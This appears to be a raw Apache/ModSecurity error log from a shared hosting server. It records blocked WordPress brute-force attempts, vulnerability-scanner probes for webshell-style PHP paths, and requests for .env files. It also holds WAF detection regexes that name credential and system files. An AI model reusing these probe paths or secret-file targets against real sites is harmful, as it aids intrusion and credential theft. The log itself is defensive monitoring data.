[Tue May 26 18:54:03.903355 2026] [security2:error] [pid 1036960:tid 1037003] [remote 185.190.18.72:58026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahWe84GNKXNii6nttH9erQAAzSo"]
[Tue May 26 18:54:04.502109 2026] [security2:error] [pid 1036960:tid 1036998] [remote 103.91.67.202:53906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe9IGNKXNii6nttH9evgAA8iU"]
[Tue May 26 18:54:05.054669 2026] [security2:error] [pid 1036960:tid 1037028] [remote 103.91.67.202:53906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe9IGNKXNii6nttH9e1QAAqEM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:54:05.408984 2026] [security2:error] [pid 1036960:tid 1037030] [remote 196.188.249.61:55902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWe9YGNKXNii6nttH9e3QAAxUU"]
[Tue May 26 18:54:05.998339 2026] [security2:error] [pid 1036960:tid 1037096] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe9YGNKXNii6nttH9e6QAAAIs"]
[Tue May 26 18:54:06.196236 2026] [security2:error] [pid 1036960:tid 1037033] [remote 196.188.249.61:55902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWe9oGNKXNii6nttH9e9wAAyEg"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:54:08.222378 2026] [security2:error] [pid 1036960:tid 1037152] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe94GNKXNii6nttH9fKgAAAMM"]
[Tue May 26 18:54:08.843981 2026] [security2:error] [pid 1036960:tid 1037170] [client 45.94.31.222:61699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-plain.php"] [unique_id "ahWe-IGNKXNii6nttH9fVgAAANU"], referer: www.google.com
[Tue May 26 18:54:08.851169 2026] [security2:error] [pid 1036960:tid 1037215] [client 45.94.31.222:61698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWe-IGNKXNii6nttH9fWAAAAQI"], referer: www.google.com
[Tue May 26 18:54:08.865996 2026] [security2:error] [pid 1036960:tid 1037176] [client 45.94.31.222:61700] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWe-IGNKXNii6nttH9fWgAAANs"]
[Tue May 26 18:54:09.389984 2026] [security2:error] [pid 1036960:tid 1037092] [client 45.94.31.222:60737] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWe-YGNKXNii6nttH9fagAAAIc"], referer: www.google.com
[Tue May 26 18:54:09.840686 2026] [security2:error] [pid 1036960:tid 1037161] [client 45.94.31.222:61690] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahWe-IGNKXNii6nttH9fVQAAAMw"], referer: www.google.com
[Tue May 26 18:54:09.958577 2026] [security2:error] [pid 1036960:tid 1037051] [remote 168.63.79.147:50362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe-YGNKXNii6nttH9fdwAA1Fo"]
[Tue May 26 18:54:10.378828 2026] [security2:error] [pid 1036960:tid 1037211] [client 45.94.31.222:61690] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahWe-oGNKXNii6nttH9fjwAAAP4"], referer: www.google.com
[Tue May 26 18:54:10.585290 2026] [security2:error] [pid 1036960:tid 1037079] [remote 168.63.79.147:50362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWe-oGNKXNii6nttH9fmAAAhXY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:54:10.646730 2026] [security2:error] [pid 1036960:tid 1037213] [client 45.94.31.222:61696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/lrcieodz.php"] [unique_id "ahWe-oGNKXNii6nttH9fmwAAAQA"], referer: www.google.com
[Tue May 26 18:54:10.862502 2026] [security2:error] [pid 1036960:tid 1037151] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe-oGNKXNii6nttH9flwAAAMI"]
[Tue May 26 18:54:11.157215 2026] [security2:error] [pid 1036960:tid 1037171] [client 45.94.31.222:62707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-plain.php"] [unique_id "ahWe-4GNKXNii6nttH9frQAAANY"], referer: www.google.com
[Tue May 26 18:54:11.518806 2026] [security2:error] [pid 1036960:tid 1037095] [client 45.94.31.222:56691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWe-4GNKXNii6nttH9fswAAAIo"]
[Tue May 26 18:54:11.745390 2026] [autoindex:error] [pid 1036960:tid 1037164] [client 185.169.4.152:0] AH01276: Cannot serve directory /home2/onesomzc/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:54:11.992923 2026] [security2:error] [pid 1036960:tid 1037113] [client 45.94.31.222:53362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/eizuyufc.php"] [unique_id "ahWe-4GNKXNii6nttH9fzAAAAJw"], referer: www.google.com
[Tue May 26 18:54:12.031606 2026] [security2:error] [pid 1036960:tid 1037214] [client 154.16.226.239:45219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWe-4GNKXNii6nttH9frgAAAQE"], referer: https://www.cagmedya.com/yenilikci-ve-etkili-web-tasarim-trendleri/
[Tue May 26 18:54:12.144178 2026] [security2:error] [pid 1036960:tid 1037037] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe-4GNKXNii6nttH9fxwAA70w"]
[Tue May 26 18:54:12.144412 2026] [security2:error] [pid 1036960:tid 1037196] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWe-4GNKXNii6nttH9fxwAA70w"]
[Tue May 26 18:54:12.462603 2026] [security2:error] [pid 1036960:tid 1037096] [client 45.94.31.222:56691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWe_IGNKXNii6nttH9f2AAAAIs"]
[Tue May 26 18:54:12.957851 2026] [security2:error] [pid 1036960:tid 1037120] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe_IGNKXNii6nttH9f4QAAAKM"]
[Tue May 26 18:54:13.642231 2026] [security2:error] [pid 1036960:tid 1037111] [client 93.174.93.12:60000] ModSecurity: Warning. Match of "ipMatch 127.0.0.1,::1" against "REMOTE_ADDR" required. [file "/etc/httpd/modsecurity.d/00_asl_zz_strict.conf"] [line "82"] [id "331030"] [rev "2"] [msg "Atomicorp.com WAF Rules: Suspicious activity detected - HTTP Request Missing a Host Header"] [severity "NOTICE"] [tag "no_ar"] [hostname "md-74.webhostbox.net"] [uri "/"] [unique_id "ahWe_YGNKXNii6nttH9gBAAAAJo"]
[Tue May 26 18:54:13.759744 2026] [security2:error] [pid 1036960:tid 1037175] [client 45.94.31.222:56691] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWe_YGNKXNii6nttH9gDgAAANo"]
[Tue May 26 18:54:14.646711 2026] [security2:error] [pid 1036960:tid 1037166] [client 202.76.169.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe_oGNKXNii6nttH9gHwAAANE"]
[Tue May 26 18:54:14.652966 2026] [security2:error] [pid 1036960:tid 1037165] [client 45.94.31.222:56697] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 222.31.94.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWe_oGNKXNii6nttH9gLQAAANA"]
[Tue May 26 18:54:15.175140 2026] [security2:error] [pid 1036960:tid 1037154] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWe_oGNKXNii6nttH9gMwAAAMU"]
[Tue May 26 18:54:16.235390 2026] [security2:error] [pid 1036960:tid 1037150] [client 31.57.184.107:54801] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onesoft.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWfAIGNKXNii6nttH9gVQAAAME"], referer: https://duckduckgo.com/
[Tue May 26 18:54:16.737657 2026] [security2:error] [pid 1036960:tid 1037063] [remote 14.161.17.36:37038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfAIGNKXNii6nttH9gYwAAumY"]
[Tue May 26 18:54:17.050767 2026] [security2:error] [pid 1036960:tid 1037177] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfAIGNKXNii6nttH9gZgAAANw"]
[Tue May 26 18:54:18.089791 2026] [security2:error] [pid 1036960:tid 1037076] [remote 113.190.40.93:55010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWfAYGNKXNii6nttH9gjQAAwXM"]
[Tue May 26 18:54:19.449873 2026] [security2:error] [pid 1036960:tid 1037215] [client 185.191.171.8:46316] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-13th/day/2024-09-18/"] [unique_id "ahWfA4GNKXNii6nttH9guwAAAQI"]
[Tue May 26 18:54:19.450095 2026] [security2:error] [pid 1036960:tid 1037215] [client 185.191.171.8:46316] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/september-13th/day/2024-09-18/"] [unique_id "ahWfA4GNKXNii6nttH9guwAAAQI"]
[Tue May 26 18:54:19.844852 2026] [security2:error] [pid 1036960:tid 1037201] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfA4GNKXNii6nttH9gugAAAPQ"]
[Tue May 26 18:54:20.061780 2026] [security2:error] [pid 1036960:tid 1037176] [client 107.170.66.128:60130] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consultrgb.moes-art.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWfBIGNKXNii6nttH9gygAAANs"]
[Tue May 26 18:54:21.498654 2026] [security2:error] [pid 1036960:tid 1037134] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfBYGNKXNii6nttH9g7AAAALE"]
[Tue May 26 18:54:21.750298 2026] [security2:error] [pid 1036960:tid 1036974] [remote 111.229.141.137:55000] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWfBYGNKXNii6nttH9g-gAAlg0"]
[Tue May 26 18:54:22.630040 2026] [security2:error] [pid 1036960:tid 1036979] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfBoGNKXNii6nttH9hGwAAyRI"]
[Tue May 26 18:54:22.630251 2026] [security2:error] [pid 1036960:tid 1037158] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWfBoGNKXNii6nttH9hGwAAyRI"]
[Tue May 26 18:54:23.930022 2026] [security2:error] [pid 1036960:tid 1037110] [client 23.80.82.10:54020] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahWfB4GNKXNii6nttH9hQQAAAJk"]
[Tue May 26 18:54:24.454920 2026] [security2:error] [pid 1036960:tid 1037143] [client 23.80.82.10:43860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/api/.env"] [unique_id "ahWfCIGNKXNii6nttH9hVQAAALo"]
[Tue May 26 18:54:24.457836 2026] [security2:error] [pid 1036960:tid 1037147] [client 23.80.82.10:43842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/backend/.env"] [unique_id "ahWfCIGNKXNii6nttH9hYAAAAL4"]
[Tue May 26 18:54:24.498229 2026] [security2:error] [pid 1036960:tid 1037091] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfCIGNKXNii6nttH9hSAAAAIY"]
[Tue May 26 18:54:26.249977 2026] [security2:error] [pid 1036960:tid 1036983] [remote 74.91.224.220:43456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWfCoGNKXNii6nttH9hzAAA3BY"]
[Tue May 26 18:54:26.809070 2026] [security2:error] [pid 1036960:tid 1037163] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfCoGNKXNii6nttH9h5QAAAM4"]
[Tue May 26 18:54:26.955925 2026] [security2:error] [pid 1036960:tid 1036997] [remote 74.91.224.220:43456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWfCoGNKXNii6nttH9h_wABACQ"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:54:27.547592 2026] [proxy:error] [pid 1036960:tid 1037120] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:27.547683 2026] [proxy_http:error] [pid 1036960:tid 1037120] [client 208.84.100.18:14984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:27.548298 2026] [proxy:error] [pid 1036960:tid 1037120] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:27.548340 2026] [proxy_http:error] [pid 1036960:tid 1037120] [client 208.84.100.18:14984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:27.670810 2026] [security2:error] [pid 1036960:tid 1037131] [client 158.69.22.136:4982] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahWfCoGNKXNii6nttH9h8wAAAK4"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 18:54:27.883074 2026] [security2:error] [pid 1036960:tid 1037144] [client 104.28.122.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWfC4GNKXNii6nttH9iFwAAALs"]
[Tue May 26 18:54:29.126617 2026] [security2:error] [pid 1036960:tid 1037097] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfDIGNKXNii6nttH9iLgAAAIw"]
[Tue May 26 18:54:30.898867 2026] [security2:error] [pid 1036960:tid 1037210] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWfDoGNKXNii6nttH9iWwAAAP0"]
[Tue May 26 18:54:32.272033 2026] [security2:error] [pid 1036960:tid 1037002] [remote 88.198.165.116:47458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfEIGNKXNii6nttH9ifAAAyik"]
[Tue May 26 18:54:32.317713 2026] [security2:error] [pid 1036960:tid 1036998] [remote 94.76.235.103:39568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWfEIGNKXNii6nttH9ifwAAxiU"]
[Tue May 26 18:54:32.335383 2026] [proxy:error] [pid 1036960:tid 1037216] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.335452 2026] [proxy_http:error] [pid 1036960:tid 1037216] [client 208.84.100.18:15244] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.336326 2026] [proxy:error] [pid 1036960:tid 1037216] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:54:32.336372 2026] [proxy_http:error] [pid 1036960:tid 1037216] [client 208.84.100.18:15244] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:54:32.336612 2026] [proxy:error] [pid 1036960:tid 1037160] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
